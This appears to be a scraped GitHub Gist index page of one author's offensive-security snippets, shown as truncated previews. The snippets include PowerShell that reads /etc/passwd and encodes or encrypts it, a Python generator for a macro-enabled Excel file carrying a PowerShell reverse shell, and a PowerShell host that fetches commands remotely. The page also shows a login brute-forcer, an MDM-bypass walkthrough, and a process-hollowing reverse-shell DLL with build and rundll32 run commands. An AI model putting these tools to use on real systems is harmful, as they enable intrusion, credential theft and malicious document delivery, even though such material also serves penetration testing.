Frank Spierings FrankSpierings

FrankSpierings / sql-query-ps-oneliner.ps1
Last active Jul 14, 2021
PowerShell one-liner to run a database query and print the result as a table.
powershell "$sql='SELECT @@VERSION';$c=(New-Object -TypeName System.Data.SqlClient.SqlConnection('server=SERVER;Database=DATABASE;Integrated Security=True;'));$c.Open();$q=(New-Object System.Data.SqlClient.SqlCommand($sql,$c));$r=$q.ExecuteReader();$oo=@();while ($r.Read()){$o=(New-Object PSObject);for ($i=0;$i -lt $r.FieldCount;$i++){$n=$r.GetName($i);if($n -eq ''){$n='column_'+$i};$o|Add-Member -type NoteProperty -Name $n -Value $r[$i];}$oo+=$o};$oo|FT -Wrap"
FrankSpierings / read-file-aesencrypt-base54.ps1
$filepath = "/etc/passwd"
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open);
$ms = New-Object System.IO.MemoryStream;
$aes = [System.Security.Cryptography.Aes]::Create();
$aes.keysize = 128;
Write-Host "Key: " (($aes.Key |% ToString X2) -join '');
Write-Host "IV: " (($aes.IV |% ToString X2) -join '');
Write-Host "Mode: " $aes.mode
$cs = New-Object System.Security.Cryptography.CryptoStream($ms, $aes.CreateEncryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write);
FrankSpierings / read-file-gzip-base64.ps1
Last active Jul 8, 2021
Read file, gzip and convert to base64.
$filepath = "/etc/passwd"
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open)
$ms = New-Object System.IO.MemoryStream;
$gzs = New-Object System.IO.Compression.GzipStream($ms, [System.IO.Compression.CompressionMode]::Compress);
FrankSpierings /
Created Apr 30, 2021
Generate an XLSM macro from Python
import codecs
import base64
data = '''$lhost="";
$client = New-Object System.Net.Sockets.TCPClient($lhost, $lport);
$stream = $client.GetStream();
FrankSpierings / pshost.cs
Created Apr 29, 2021
PowerShell host example that obtains its commands from a remote location.
// c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe pshost.cs /r:c:\Windows\assembly\GAC_MSIL\System.Management.Automation\\System.Management.Automation.dll
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using PowerShell = System.Management.Automation.PowerShell;
internal class InfantAnnihilator
private static void Main(string[] args)
FrankSpierings /
Last active Apr 25, 2021
Decrypt a protected file using a PVK domain key
# Referenced sources:
# - Mimikatz
# -
# -
from io import BytesIO
import struct
import math
import codecs
from Crypto.PublicKey import RSA
FrankSpierings /
Created Mar 16, 2021
Brutus - Brute-force login on a Xelion system using their own classes.
- Get the .jar files from the server (check the .jnlp file).
- Extract those .jar files (unzip).
- Place them in the same directory.
- Compile using the JDK: "c:\Program Files\Java\jdk-16\bin\javac.exe" -target 1.7 -source 1.7
- Note the target and source versions; otherwise CORBA can't be found.
- Run: java Brutus <accountname> <ascii password file> <target>
- Example: java Brutus beheerder passwords.txt xelion.local
FrankSpierings /
Created Feb 25, 2021
SAMLRaider in Python, useful for automating (new) logins and the automatic exploit checks.
import xml.dom.minidom as minidom
# Constants
class SAMLRaider():
def __init__(self, match_replace_map: dict = None):
"""SAMLRaider object
FrankSpierings / README.MD
Last active May 31, 2021
Apple Device Enrollment Program (DEP) - Bypass MDM policy using the checkra1n exploit

  • Install a socket daemon to multiplex connections from and to iOS devices, run: brew install usbmuxd
  • Start the socket daemon: iproxy 2222 44
  • Install the checkra1n exploit locally, run: brew install checkra1n
  • When SSH password authentication is requested, use: alpine.

Wipe iPad and restore Firmware

FrankSpierings / process-hollow-shell-dll.c
Last active Jul 25, 2021
Reverse shell that uses the process hollowing technique
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll"
// Use -DDEBUG at compile time to enable the printf logging messages.
// Use -DNON_MS_DLL_BLOCK at compile time to block injection of non-Microsoft DLLs into the host process.
// Use -DWAITFOR at compile time to wait for the host process to finish.
// Run:
// rundll32 process-hollow-shell.dll,main 4444
// rundll32 process-hollow-shell.dll,main 4444 c:\windows\system32\cmd.exe
// rundll32 process-hollow-shell.dll,main 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe